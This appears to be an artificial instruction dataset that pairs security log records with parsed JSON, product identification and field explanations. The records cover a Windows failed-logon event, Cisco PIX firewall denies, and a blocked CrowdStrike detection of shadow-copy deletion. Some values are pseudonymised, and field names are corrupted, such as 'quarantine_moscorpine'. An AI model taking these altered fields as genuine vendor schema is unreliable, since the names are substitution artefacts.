"senderhost": "10.87.1.30", "sensitivity": "normal", "severitylabel": "Info", "sourceinfo": "unknown", "tags": [ "v8", "eventId:4625", "microsoft-windows-security-auditing", "auth_failure" ], "vendorcode": "6082954626", "streamName": "microsoft-windows-security-auditing", "clientIP": "153.202.14.113", "userName": "alice" }
Create a JSON artifact from the message
WitFoo-WinLogBeat ::: {"@metadata":{"beat":"winlogbeat","type":"_doc","version":"8.1.3"},"@timestamp":"2023-07-17T18:11:48.924Z","agent":{"ephemeral_id":"4c83ecad-c1b4-4a54-8b3d-8fd365195907","id":"8291ec57-310c-4e62-b5bc-e9ba4ac93b35","name":"03SDPBSVR03","type":"winlogbeat","version":"8.1.3"},"ecs":{"version":"8.0.0"},"event":{"action":"Logon","code":"4625","created":"2023-07-17T18:11:50.394Z","kind":"event","outcome":"failure","provider":"Microsoft-Windows-Security-Auditing"},"host":{"name":"03SDPBSVR03.SDPB.LOCAL"},"log":{"level":"information"},"message":"An account failed to log on.\n\nSubject:\n\tSecurity ID:\t\tS-1-0-0\n\tAccount Name:\t\t-\n\tAccount Domain:\t\t-\n\tLogon ID:\t\t0x0\n\nLogon Type:\t\t\t3\n\nAccount For Which Logon Failed:\n\tSecurity ID:\t\tS-1-0-0\n\tAccount Name:\t\talice\n\tAccount Domain:\t\tSDPB\n\nFailure Information:\n\tFailure Reason:\t\tUnknown user name or bad password.\n\tStatus:\t\t\t0xC000006D\n\tSub Status:\t\t0xC000006A\n\nProcess Information:\n\tCaller Process ID:\t0x0\n\tCaller Process Name:\t-\n\nNetwork Information:\n\tWorkstation Name:\tIDCSAVIYNT02\n\tSource Network Address:\t153.202.14.113\n\tSource Port:\t\t61238\n\nDetailed Authentication Information:\n\tLogon Process:\t\tNtLmSsp \n\tAuthentication Package:\tNTLM\n\tTransited Services:\t-\n\tPackage Name (NTLM only):\t-\n\tKey Length:\t\t0\n\nThis event is generated when a logon request fails. It is generated on the computer where access was attempted.\n\nThe Subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\n\nThe Logon Type field indicates the kind of logon that was requested. The most common types are 2 (interactive) and 3 (network).\n\nThe Process Information fields indicate which account and process on the system requested the logon.\n\nThe Network Information fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\n\nThe authentication information fields provide detailed information about this specific logon request.\n\t- Transited services indicate which intermediate services have participated in this logon request.\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","organization":"oscorp","senderHost":"10.87.1.30","sensitivity":"normal","winlog":{"api":"wineventlog","channel":"Security","computer_name":"03SDPBSVR03.SDPB.LOCAL","event_data":{"AuthenticationPackageName":"NTLM","FailureReason":"%%2313","IpAddress":"153.202.14.113","IpPort":"61238","KeyLength":"0","LmPackageName":"-","LogonProcessName":"NtLmSsp ","LogonType":"3","ProcessId":"0x0","ProcessName":"-","Status":"0xc000006d","SubStatus":"0xc000006a","SubjectDomainName":"-","SubjectLogonId":"0x0","SubjectUserName":"-","SubjectUserSid":"S-1-0-0","TargetDomainName":"SDPB","TargetUserName":"alice","TargetUserSid":"S-1-0-0","TransmittedServices":"-","WorkstationName":"IDCSAVIYNT02"},"event_id":"4625","keywords":["Audit Failure"],"opcode":"Info","process":{"pid":740,"thread":{"id":13644}},"provider_guid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","provider_name":"Microsoft-Windows-Security-Auditing","record_id":6082954626,"task":"Logon"}}
Product: Windows Active Directory Vendor: Microsoft
Identify this syslog message
WitFoo-WinLogBeat ::: {"@metadata":{"beat":"winlogbeat","type":"_doc","version":"8.1.3"},"@timestamp":"2023-07-17T18:11:48.924Z","agent":{"ephemeral_id":"4c83ecad-c1b4-4a54-8b3d-8fd365195907","id":"8291ec57-310c-4e62-b5bc-e9ba4ac93b35","name":"03SDPBSVR03","type":"winlogbeat","version":"8.1.3"},"ecs":{"version":"8.0.0"},"event":{"action":"Logon","code":"4625","created":"2023-07-17T18:11:50.394Z","kind":"event","outcome":"failure","provider":"Microsoft-Windows-Security-Auditing"},"host":{"name":"03SDPBSVR03.SDPB.LOCAL"},"log":{"level":"information"},"message":"An account failed to log on.\n\nSubject:\n\tSecurity ID:\t\tS-1-0-0\n\tAccount Name:\t\t-\n\tAccount Domain:\t\t-\n\tLogon ID:\t\t0x0\n\nLogon Type:\t\t\t3\n\nAccount For Which Logon Failed:\n\tSecurity ID:\t\tS-1-0-0\n\tAccount Name:\t\talice\n\tAccount Domain:\t\tSDPB\n\nFailure Information:\n\tFailure Reason:\t\tUnknown user name or bad password.\n\tStatus:\t\t\t0xC000006D\n\tSub Status:\t\t0xC000006A\n\nProcess Information:\n\tCaller Process ID:\t0x0\n\tCaller Process Name:\t-\n\nNetwork Information:\n\tWorkstation Name:\tIDCSAVIYNT02\n\tSource Network Address:\t153.202.14.113\n\tSource Port:\t\t61238\n\nDetailed Authentication Information:\n\tLogon Process:\t\tNtLmSsp \n\tAuthentication Package:\tNTLM\n\tTransited Services:\t-\n\tPackage Name (NTLM only):\t-\n\tKey Length:\t\t0\n\nThis event is generated when a logon request fails. It is generated on the computer where access was attempted.\n\nThe Subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\n\nThe Logon Type field indicates the kind of logon that was requested. The most common types are 2 (interactive) and 3 (network).\n\nThe Process Information fields indicate which account and process on the system requested the logon.\n\nThe Network Information fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\n\nThe authentication information fields provide detailed information about this specific logon request.\n\t- Transited services indicate which intermediate services have participated in this logon request.\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","organization":"oscorp","senderHost":"10.87.1.30","sensitivity":"normal","winlog":{"api":"wineventlog","channel":"Security","computer_name":"03SDPBSVR03.SDPB.LOCAL","event_data":{"AuthenticationPackageName":"NTLM","FailureReason":"%%2313","IpAddress":"153.202.14.113","IpPort":"61238","KeyLength":"0","LmPackageName":"-","LogonProcessName":"NtLmSsp ","LogonType":"3","ProcessId":"0x0","ProcessName":"-","Status":"0xc000006d","SubStatus":"0xc000006a","SubjectDomainName":"-","SubjectLogonId":"0x0","SubjectUserName":"-","SubjectUserSid":"S-1-0-0","TargetDomainName":"SDPB","TargetUserName":"alice","TargetUserSid":"S-1-0-0","TransmittedServices":"-","WorkstationName":"IDCSAVIYNT02"},"event_id":"4625","keywords":["Audit Failure"],"opcode":"Info","process":{"pid":740,"thread":{"id":13644}},"provider_guid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","provider_name":"Microsoft-Windows-Security-Auditing","record_id":6082954626,"task":"Logon"}}
This is a syslog message from a product called Windows Active Directory by Microsoft. The following fields were extracted from the message: action: Logon clientport: 61238 messagetype: auth_failure productids: [6] senderhost: 10.87.1.30 sensitivity: normal severitylabel: Info sourceinfo: unknown tags: ['v8', 'eventId:4625', 'microsoft-windows-security-auditing', 'auth_failure'] vendorcode: 6082954626 streamName: microsoft-windows-security-auditing clientIP: 153.202.14.113 userName: alice
Explain this syslog message
<172>Feb 12 2023 14:07:02 10.52.255.1 : %PIX-4-106023: Deny tcp src inside:91.195.154.213/54183 dst outside:33.56.204.210/7680 by access-group "inside"
{ "priority": 172, "senderhost": "10.52.255.1", "serverport": 7680, "severitylabel": "warning", "tags": [ "cisco_pix_deny", "deny", "cisco_pix", "firewall_action" ], "productids": [ 0 ], "severitycode": 4, "sourceinfo": "unknown", "message": "<172>Feb 12 2023 14:07:02 10.52.255.1 : %PIX-4-106023: Deny tcp src inside:91.195.154.213/54183 dst outside:33.56.204.210/7680 by access-group \"inside\"\n", "sensitivity": "normal", "facilitylabel": "local5", "messagetype": "firewall_action", "clientport": 54183, "vendorcode": "PIX-4-106023", "action": "block", "protocol": 6, "facilitycode": 21, "streamName": "cisco_pix", "clientIP": "91.195.154.213", "serverIP": "33.56.204.210" }
Create a JSON artifact from the message
<172>Feb 12 2023 14:07:02 10.52.255.1 : %PIX-4-106023: Deny tcp src inside:91.195.154.213/54183 dst outside:33.56.204.210/7680 by access-group "inside"
Product: PIX Firewall Vendor: Cisco
Identify this syslog message
<172>Feb 12 2023 14:07:02 10.52.255.1 : %PIX-4-106023: Deny tcp src inside:91.195.154.213/54183 dst outside:33.56.204.210/7680 by access-group "inside"
This is a syslog message from a product called PIX Firewall by Cisco. The following fields were extracted from the message: priority: 172 senderhost: 10.52.255.1 serverport: 7680 severitylabel: warning tags: ['cisco_pix_deny', 'deny', 'cisco_pix', 'firewall_action'] productids: [0] severitycode: 4 sourceinfo: unknown sensitivity: normal facilitylabel: local5 messagetype: firewall_action clientport: 54183 vendorcode: PIX-4-106023 action: block protocol: 6 facilitycode: 21 streamName: cisco_pix clientIP: 91.195.154.213 serverIP: 33.56.204.210
Explain this syslog message
<172>Feb 12 2023 14:07:02 10.52.255.1 : %PIX-4-106023: Deny tcp src inside:146.225.241.123/54183 dst outside:46.16.209.249/7680 by access-group "inside"
{ "priority": 172, "senderhost": "10.52.255.1", "serverport": 7680, "severitylabel": "warning", "tags": [ "cisco_pix_deny", "deny", "cisco_pix", "firewall_action" ], "productids": [ 0 ], "severitycode": 4, "sourceinfo": "unknown", "message": "<172>Feb 12 2023 14:07:02 10.52.255.1 : %PIX-4-106023: Deny tcp src inside:146.225.241.123/54183 dst outside:46.16.209.249/7680 by access-group \"inside\"\n", "sensitivity": "normal", "facilitylabel": "local5", "messagetype": "firewall_action", "clientport": 54183, "vendorcode": "PIX-4-106023", "action": "block", "protocol": 6, "facilitycode": 21, "streamName": "cisco_pix", "clientIP": "146.225.241.123", "serverIP": "46.16.209.249" }
Create a JSON artifact from the message
<172>Feb 12 2023 14:07:02 10.52.255.1 : %PIX-4-106023: Deny tcp src inside:146.225.241.123/54183 dst outside:46.16.209.249/7680 by access-group "inside"
Product: PIX Firewall Vendor: Cisco
Identify this syslog message
<172>Feb 12 2023 14:07:02 10.52.255.1 : %PIX-4-106023: Deny tcp src inside:146.225.241.123/54183 dst outside:46.16.209.249/7680 by access-group "inside"
This is a syslog message from a product called PIX Firewall by Cisco. The following fields were extracted from the message: priority: 172 senderhost: 10.52.255.1 serverport: 7680 severitylabel: warning tags: ['cisco_pix_deny', 'deny', 'cisco_pix', 'firewall_action'] productids: [0] severitycode: 4 sourceinfo: unknown sensitivity: normal facilitylabel: local5 messagetype: firewall_action clientport: 54183 vendorcode: PIX-4-106023 action: block protocol: 6 facilitycode: 21 streamName: cisco_pix clientIP: 146.225.241.123 serverIP: 46.16.209.249
Explain this syslog message
<172>Feb 12 2023 14:07:02 10.52.255.1 : %PIX-4-106023: Deny icmp src outside:150.97.212.10 dst inside:120.36.48.73 (type 11, code 0) by access-group "outside"
{ "priority": 172, "senderhost": "10.52.255.1", "severitylabel": "warning", "tags": [ "cisco_pix_deny", "deny", "cisco_pix", "firewall_action" ], "productids": [ 0 ], "severitycode": 4, "sourceinfo": "unknown", "message": "<172>Feb 12 2023 14:07:02 10.52.255.1 : %PIX-4-106023: Deny icmp src outside:150.97.212.10 dst inside:120.36.48.73 (type 11, code 0) by access-group \"outside\"\n", "sensitivity": "normal", "facilitylabel": "local5", "messagetype": "firewall_action", "vendorcode": "PIX-4-106023", "action": "block", "protocol": 1, "facilitycode": 21, "streamName": "cisco_pix", "clientIP": "150.97.212.10", "serverIP": "120.36.48.73" }
Create a JSON artifact from the message
<172>Feb 12 2023 14:07:02 10.52.255.1 : %PIX-4-106023: Deny icmp src outside:150.97.212.10 dst inside:120.36.48.73 (type 11, code 0) by access-group "outside"
Product: PIX Firewall Vendor: Cisco
Identify this syslog message
<172>Feb 12 2023 14:07:02 10.52.255.1 : %PIX-4-106023: Deny icmp src outside:150.97.212.10 dst inside:120.36.48.73 (type 11, code 0) by access-group "outside"
This is a syslog message from a product called PIX Firewall by Cisco. The following fields were extracted from the message: priority: 172 senderhost: 10.52.255.1 severitylabel: warning tags: ['cisco_pix_deny', 'deny', 'cisco_pix', 'firewall_action'] productids: [0] severitycode: 4 sourceinfo: unknown sensitivity: normal facilitylabel: local5 messagetype: firewall_action vendorcode: PIX-4-106023 action: block protocol: 1 facilitycode: 21 streamName: cisco_pix clientIP: 150.97.212.10 serverIP: 120.36.48.73
Explain this syslog message
<172>Feb 12 2023 14:07:02 10.52.255.1 : %PIX-4-106023: Deny icmp src outside:108.223.199.97 dst inside:66.54.39.15 (type 11, code 0) by access-group "outside"
{ "priority": 172, "senderhost": "10.52.255.1", "severitylabel": "warning", "tags": [ "cisco_pix_deny", "deny", "cisco_pix", "firewall_action" ], "productids": [ 0 ], "severitycode": 4, "sourceinfo": "unknown", "message": "<172>Feb 12 2023 14:07:02 10.52.255.1 : %PIX-4-106023: Deny icmp src outside:108.223.199.97 dst inside:66.54.39.15 (type 11, code 0) by access-group \"outside\"\n", "sensitivity": "normal", "facilitylabel": "local5", "messagetype": "firewall_action", "vendorcode": "PIX-4-106023", "action": "block", "protocol": 1, "facilitycode": 21, "streamName": "cisco_pix", "clientIP": "108.223.199.97", "serverIP": "66.54.39.15" }
Create a JSON artifact from the message
<172>Feb 12 2023 14:07:02 10.52.255.1 : %PIX-4-106023: Deny icmp src outside:108.223.199.97 dst inside:66.54.39.15 (type 11, code 0) by access-group "outside"
Product: PIX Firewall Vendor: Cisco
Identify this syslog message
<172>Feb 12 2023 14:07:02 10.52.255.1 : %PIX-4-106023: Deny icmp src outside:108.223.199.97 dst inside:66.54.39.15 (type 11, code 0) by access-group "outside"
This is a syslog message from a product called PIX Firewall by Cisco. The following fields were extracted from the message: priority: 172 senderhost: 10.52.255.1 severitylabel: warning tags: ['cisco_pix_deny', 'deny', 'cisco_pix', 'firewall_action'] productids: [0] severitycode: 4 sourceinfo: unknown sensitivity: normal facilitylabel: local5 messagetype: firewall_action vendorcode: PIX-4-106023 action: block protocol: 1 facilitycode: 21 streamName: cisco_pix clientIP: 108.223.199.97 serverIP: 66.54.39.15
Explain this syslog message
WitFoo-Artifact ::: message={"device_id":"3810ea13b98a42adb0ff227fbaf6169f","timestamp":"2023-10-17T20:24:24Z","behavior_id":"458","filename":"setup.exe","filepath":"\\Device\\HarddiskVolume3\\Program Files (x86)\\epson\\EPSON Advanced Printer Driver 5\\TM-T88V\\TM-T88V Utility\\setup.exe","alleged_filetype":"exe","cmdline":"\"C:\\Program Files (x86)\\EPSON\\EPSON Advanced Printer Driver 5\\TM-T88V\\TM-T88V Utility\\setup.exe\" -PSM -HIDE_PROGRESS -W32:592210 -PRD:APD","scenario":"ransomware","objective":"Follow Through","tactic":"Impact","tactic_id":"TA0040","technique":"Inhibit System Recovery","technique_id":"T1490","display_name":"VolumeShadowSnapshotDeleted","description":"A process attempted to delete a Volume Shadow Snapshot.","severity":50,"confidence":60,"ioc_type":"","ioc_value":"","ioc_source":"","ioc_description":"","user_name":"fish","user_id":"S-1-12-1-942142572-1204970278-157880471-3270697999","control_graph_id":"ctg:3810ea13b98a42adb0ff227fbaf6169f:81604677450","triggering_process_graph_id":"pid:3810ea13b98a42adb0ff227fbaf6169f:4594730739079","sha256":"1a47b9ec8ffa137a49a9ee5de6dcc2037179d1b2213ae54fe3c5cbef3145ca18","md5":"eb33b049f629677d0b48ac82e1aad6d7","parent_details":{"parent_sha256":"faf27799b04c2780dc06360f77d13d0656d78658a005d7e20a44d45b4b3f2235","parent_md5":"c85df204a8fe49fc690202c5ccd27b5b","parent_cmdline":"\"C:\\Users\\STEVEN~1\\AppData\\Local\\Temp\\APD5\\Setup.exe\" ","parent_process_graph_id":"pid:3810ea13b98a42adb0ff227fbaf6169f:4594712136312"},"pattern_disposition":1024,"pattern_disposition_details":{"indicator":false,"detect":false,"inddet_mask":false,"sensor_only":false,"rooting":false,"kill_process":false,"kill_subprocess":false,"quarantine_moscorpine":false,"quarantine_file":false,"policy_disabled":false,"kill_parent":false,"operation_blocked":true,"process_blocked":false,"registry_operation_blocked":false,"critical_process_disabled":false,"bootup_safeguard_enabled":false,"fs_operation_blocked":false,"handle_operation_downgraded":false,"kill_action_failed":false,"blocking_unsupported_or_disabled":false,"suspend_process":false,"suspend_parent":false}} ::: clientIP=48.55.147.74 ::: fileHash=1a47b9ec8ffa137a49a9ee5de6dcc2037179d1b2213ae54fe3c5cbef3145ca18 ::: fileName=setup.exe ::: filePath=\Device\HarddiskVolume3\Program Files (x86)\epson\EPSON Advanced Printer Driver 5\TM-T88V\TM-T88V Utility\setup.exe ::: userName=fish ::: clientMAC=00ffc8e92fdb ::: created_at=2023-10-17T20:24:24Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-10-17T20:24:24Z ::: clientHostname=SSTEWART-LT3.undefined ::: pipelineEntrypoint=dispatch
{ "clienthostname": "SSTEWART-LT3.undefined", "clientmac": "00ffc8e92fdb", "filehash": "1a47b9ec8ffa137a49a9ee5de6dcc2037179d1b2213ae54fe3c5cbef3145ca18", "filename": "setup.exe", "filepath": "\\Device\\HarddiskVolume3\\Program Files (x86)\\epson\\EPSON Advanced Printer Driver 5\\TM-T88V\\TM-T88V Utility\\setup.exe", "message": "WitFoo-Artifact ::: message={\"device_id\":\"3810ea13b98a42adb0ff227fbaf6169f\",\"timestamp\":\"2023-10-17T20:24:24Z\",\"behavior_id\":\"458\",\"filename\":\"setup.exe\",\"filepath\":\"\\\\Device\\\\HarddiskVolume3\\\\Program Files (x86)\\\\epson\\\\EPSON Advanced Printer Driver 5\\\\TM-T88V\\\\TM-T88V Utility\\\\setup.exe\",\"alleged_filetype\":\"exe\",\"cmdline\":\"\\\"C:\\\\Program Files (x86)\\\\EPSON\\\\EPSON Advanced Printer Driver 5\\\\TM-T88V\\\\TM-T88V Utility\\\\setup.exe\\\" -PSM -HIDE_PROGRESS -W32:592210 -PRD:APD\",\"scenario\":\"ransomware\",\"objective\":\"Follow Through\",\"tactic\":\"Impact\",\"tactic_id\":\"TA0040\",\"technique\":\"Inhibit System Recovery\",\"technique_id\":\"T1490\",\"display_name\":\"VolumeShadowSnapshotDeleted\",\"description\":\"A process attempted to delete a Volume Shadow Snapshot.\",\"severity\":50,\"confidence\":60,\"ioc_type\":\"\",\"ioc_value\":\"\",\"ioc_source\":\"\",\"ioc_description\":\"\",\"user_name\":\"fish\",\"user_id\":\"S-1-12-1-942142572-1204970278-157880471-3270697999\",\"control_graph_id\":\"ctg:3810ea13b98a42adb0ff227fbaf6169f:81604677450\",\"triggering_process_graph_id\":\"pid:3810ea13b98a42adb0ff227fbaf6169f:4594730739079\",\"sha256\":\"1a47b9ec8ffa137a49a9ee5de6dcc2037179d1b2213ae54fe3c5cbef3145ca18\",\"md5\":\"eb33b049f629677d0b48ac82e1aad6d7\",\"parent_details\":{\"parent_sha256\":\"faf27799b04c2780dc06360f77d13d0656d78658a005d7e20a44d45b4b3f2235\",\"parent_md5\":\"c85df204a8fe49fc690202c5ccd27b5b\",\"parent_cmdline\":\"\\\"C:\\\\Users\\\\STEVEN~1\\\\AppData\\\\Local\\\\Temp\\\\APD5\\\\Setup.exe\\\" \",\"parent_process_graph_id\":\"pid:3810ea13b98a42adb0ff227fbaf6169f:4594712136312\"},\"pattern_disposition\":1024,\"pattern_disposition_details\":{\"indicator\":false,\"detect\":false,\"inddet_mask\":false,\"sensor_only\":false,\"rooting\":false,\"kill_process\":false,\"kill_subprocess\":false,\"quarantine_moscorpine\":false,\"quarantine_file\":false,\"policy_disabled\":false,\"kill_parent\":false,\"operation_blocked\":true,\"process_blocked\":false,\"registry_operation_blocked\":false,\"critical_process_disabled\":false,\"bootup_safeguard_enabled\":false,\"fs_operation_blocked\":false,\"handle_operation_downgraded\":false,\"kill_action_failed\":false,\"blocking_unsupported_or_disabled\":false,\"suspend_process\":false,\"suspend_parent\":false}} ::: clientIP=48.55.147.74 ::: fileHash=1a47b9ec8ffa137a49a9ee5de6dcc2037179d1b2213ae54fe3c5cbef3145ca18 ::: fileName=setup.exe ::: filePath=\\Device\\HarddiskVolume3\\Program Files (x86)\\epson\\EPSON Advanced Printer Driver 5\\TM-T88V\\TM-T88V Utility\\setup.exe ::: userName=fish ::: clientMAC=00ffc8e92fdb ::: created_at=2023-10-17T20:24:24Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-10-17T20:24:24Z ::: clientHostname=SSTEWART-LT3.undefined ::: pipelineEntrypoint=dispatch", "messagetype": "endpoint_protection_event", "productids": [ 7 ], "senderhost": "kafka.precinct", "sensitivity": "normal", "severitycode": 4, "severitylabel": "warning", "sourceinfo": "unknown", "starttimeutc": "2023-10-17T20:24:24Z", "tags": [ "Crowdstrike Detection", "endpoint_protection_event" ], "streamName": "Crowdstrike Detection", "clientIP": "48.55.147.74", "userName": "fish" }
Create a JSON artifact from the message
WitFoo-Artifact ::: message={"device_id":"3810ea13b98a42adb0ff227fbaf6169f","timestamp":"2023-10-17T20:24:24Z","behavior_id":"458","filename":"setup.exe","filepath":"\\Device\\HarddiskVolume3\\Program Files (x86)\\epson\\EPSON Advanced Printer Driver 5\\TM-T88V\\TM-T88V Utility\\setup.exe","alleged_filetype":"exe","cmdline":"\"C:\\Program Files (x86)\\EPSON\\EPSON Advanced Printer Driver 5\\TM-T88V\\TM-T88V Utility\\setup.exe\" -PSM -HIDE_PROGRESS -W32:592210 -PRD:APD","scenario":"ransomware","objective":"Follow Through","tactic":"Impact","tactic_id":"TA0040","technique":"Inhibit System Recovery","technique_id":"T1490","display_name":"VolumeShadowSnapshotDeleted","description":"A process attempted to delete a Volume Shadow Snapshot.","severity":50,"confidence":60,"ioc_type":"","ioc_value":"","ioc_source":"","ioc_description":"","user_name":"fish","user_id":"S-1-12-1-942142572-1204970278-157880471-3270697999","control_graph_id":"ctg:3810ea13b98a42adb0ff227fbaf6169f:81604677450","triggering_process_graph_id":"pid:3810ea13b98a42adb0ff227fbaf6169f:4594730739079","sha256":"1a47b9ec8ffa137a49a9ee5de6dcc2037179d1b2213ae54fe3c5cbef3145ca18","md5":"eb33b049f629677d0b48ac82e1aad6d7","parent_details":{"parent_sha256":"faf27799b04c2780dc06360f77d13d0656d78658a005d7e20a44d45b4b3f2235","parent_md5":"c85df204a8fe49fc690202c5ccd27b5b","parent_cmdline":"\"C:\\Users\\STEVEN~1\\AppData\\Local\\Temp\\APD5\\Setup.exe\" ","parent_process_graph_id":"pid:3810ea13b98a42adb0ff227fbaf6169f:4594712136312"},"pattern_disposition":1024,"pattern_disposition_details":{"indicator":false,"detect":false,"inddet_mask":false,"sensor_only":false,"rooting":false,"kill_process":false,"kill_subprocess":false,"quarantine_moscorpine":false,"quarantine_file":false,"policy_disabled":false,"kill_parent":false,"operation_blocked":true,"process_blocked":false,"registry_operation_blocked":false,"critical_process_disabled":false,"bootup_safeguard_enabled":false,"fs_operation_blocked":false,"handle_operation_downgraded":false,"kill_action_failed":false,"blocking_unsupported_or_disabled":false,"suspend_process":false,"suspend_parent":false}} ::: clientIP=48.55.147.74 ::: fileHash=1a47b9ec8ffa137a49a9ee5de6dcc2037179d1b2213ae54fe3c5cbef3145ca18 ::: fileName=setup.exe ::: filePath=\Device\HarddiskVolume3\Program Files (x86)\epson\EPSON Advanced Printer Driver 5\TM-T88V\TM-T88V Utility\setup.exe ::: userName=fish ::: clientMAC=00ffc8e92fdb ::: created_at=2023-10-17T20:24:24Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-10-17T20:24:24Z ::: clientHostname=SSTEWART-LT3.undefined ::: pipelineEntrypoint=dispatch
Product: Falcon Vendor: Crowdstrike
Identify this syslog message
WitFoo-Artifact ::: message={"device_id":"3810ea13b98a42adb0ff227fbaf6169f","timestamp":"2023-10-17T20:24:24Z","behavior_id":"458","filename":"setup.exe","filepath":"\\Device\\HarddiskVolume3\\Program Files (x86)\\epson\\EPSON Advanced Printer Driver 5\\TM-T88V\\TM-T88V Utility\\setup.exe","alleged_filetype":"exe","cmdline":"\"C:\\Program Files (x86)\\EPSON\\EPSON Advanced Printer Driver 5\\TM-T88V\\TM-T88V Utility\\setup.exe\" -PSM -HIDE_PROGRESS -W32:592210 -PRD:APD","scenario":"ransomware","objective":"Follow Through","tactic":"Impact","tactic_id":"TA0040","technique":"Inhibit System Recovery","technique_id":"T1490","display_name":"VolumeShadowSnapshotDeleted","description":"A process attempted to delete a Volume Shadow Snapshot.","severity":50,"confidence":60,"ioc_type":"","ioc_value":"","ioc_source":"","ioc_description":"","user_name":"fish","user_id":"S-1-12-1-942142572-1204970278-157880471-3270697999","control_graph_id":"ctg:3810ea13b98a42adb0ff227fbaf6169f:81604677450","triggering_process_graph_id":"pid:3810ea13b98a42adb0ff227fbaf6169f:4594730739079","sha256":"1a47b9ec8ffa137a49a9ee5de6dcc2037179d1b2213ae54fe3c5cbef3145ca18","md5":"eb33b049f629677d0b48ac82e1aad6d7","parent_details":{"parent_sha256":"faf27799b04c2780dc06360f77d13d0656d78658a005d7e20a44d45b4b3f2235","parent_md5":"c85df204a8fe49fc690202c5ccd27b5b","parent_cmdline":"\"C:\\Users\\STEVEN~1\\AppData\\Local\\Temp\\APD5\\Setup.exe\" ","parent_process_graph_id":"pid:3810ea13b98a42adb0ff227fbaf6169f:4594712136312"},"pattern_disposition":1024,"pattern_disposition_details":{"indicator":false,"detect":false,"inddet_mask":false,"sensor_only":false,"rooting":false,"kill_process":false,"kill_subprocess":false,"quarantine_moscorpine":false,"quarantine_file":false,"policy_disabled":false,"kill_parent":false,"operation_blocked":true,"process_blocked":false,"registry_operation_blocked":false,"critical_process_disabled":false,"bootup_safeguard_enabled":false,"fs_operation_blocked":false,"handle_operation_downgraded":false,"kill_action_failed":false,"blocking_unsupported_or_disabled":false,"suspend_process":false,"suspend_parent":false}} ::: clientIP=48.55.147.74 ::: fileHash=1a47b9ec8ffa137a49a9ee5de6dcc2037179d1b2213ae54fe3c5cbef3145ca18 ::: fileName=setup.exe ::: filePath=\Device\HarddiskVolume3\Program Files (x86)\epson\EPSON Advanced Printer Driver 5\TM-T88V\TM-T88V Utility\setup.exe ::: userName=fish ::: clientMAC=00ffc8e92fdb ::: created_at=2023-10-17T20:24:24Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-10-17T20:24:24Z ::: clientHostname=SSTEWART-LT3.undefined ::: pipelineEntrypoint=dispatch
This is a syslog message from a product called Falcon by Crowdstrike. The following fields were extracted from the message: clienthostname: SSTEWART-LT3.undefined clientmac: 00ffc8e92fdb filehash: 1a47b9ec8ffa137a49a9ee5de6dcc2037179d1b2213ae54fe3c5cbef3145ca18 filename: setup.exe filepath: \Device\HarddiskVolume3\Program Files (x86)\epson\EPSON Advanced Printer Driver 5\TM-T88V\TM-T88V Utility\setup.exe messagetype: endpoint_protection_event productids: [7] senderhost: kafka.precinct sensitivity: normal severitycode: 4 severitylabel: warning sourceinfo: unknown starttimeutc: 2023-10-17T20:24:24Z tags: ['Crowdstrike Detection', 'endpoint_protection_event'] streamName: Crowdstrike Detection clientIP: 48.55.147.74 userName: fish
Explain this syslog message
WitFoo-Artifact ::: message={"device_id":"3810ea13b98a42adb0ff227fbaf6169f","timestamp":"2023-10-17T20:24:24Z","behavior_id":"458","filename":"setup.exe","filepath":"\\Device\\HarddiskVolume3\\Program Files (x86)\\epson\\EPSON Advanced Printer Driver 5\\TM-T88V\\TM-T88V Utility\\setup.exe","alleged_filetype":"exe","cmdline":"\"C:\\Program Files (x86)\\EPSON\\EPSON Advanced Printer Driver 5\\TM-T88V\\TM-T88V Utility\\setup.exe\" -PSM -HIDE_PROGRESS -W32:592210 -PRD:APD","scenario":"ransomware","objective":"Follow Through","tactic":"Impact","tactic_id":"TA0040","technique":"Inhibit System Recovery","technique_id":"T1490","display_name":"VolumeShadowSnapshotDeleted","description":"A process attempted to delete a Volume Shadow Snapshot.","severity":50,"confidence":60,"ioc_type":"","ioc_value":"","ioc_source":"","ioc_description":"","user_name":"janedoe","user_id":"S-1-12-1-942142572-1204970278-157880471-3270697999","control_graph_id":"ctg:3810ea13b98a42adb0ff227fbaf6169f:81604677450","triggering_process_graph_id":"pid:3810ea13b98a42adb0ff227fbaf6169f:4594730739079","sha256":"1a47b9ec8ffa137a49a9ee5de6dcc2037179d1b2213ae54fe3c5cbef3145ca18","md5":"eb33b049f629677d0b48ac82e1aad6d7","parent_details":{"parent_sha256":"faf27799b04c2780dc06360f77d13d0656d78658a005d7e20a44d45b4b3f2235","parent_md5":"c85df204a8fe49fc690202c5ccd27b5b","parent_cmdline":"\"C:\\Users\\STEVEN~1\\AppData\\Local\\Temp\\APD5\\Setup.exe\" ","parent_process_graph_id":"pid:3810ea13b98a42adb0ff227fbaf6169f:4594712136312"},"pattern_disposition":1024,"pattern_disposition_details":{"indicator":false,"detect":false,"inddet_mask":false,"sensor_only":false,"rooting":false,"kill_process":false,"kill_subprocess":false,"quarantine_mwayneine":false,"quarantine_file":false,"policy_disabled":false,"kill_parent":false,"operation_blocked":true,"process_blocked":false,"registry_operation_blocked":false,"critical_process_disabled":false,"bootup_safeguard_enabled":false,"fs_operation_blocked":false,"handle_operation_downgraded":false,"kill_action_failed":false,"blocking_unsupported_or_disabled":false,"suspend_process":false,"suspend_parent":false}} ::: clientIP=119.137.219.99 ::: fileHash=1a47b9ec8ffa137a49a9ee5de6dcc2037179d1b2213ae54fe3c5cbef3145ca18 ::: fileName=setup.exe 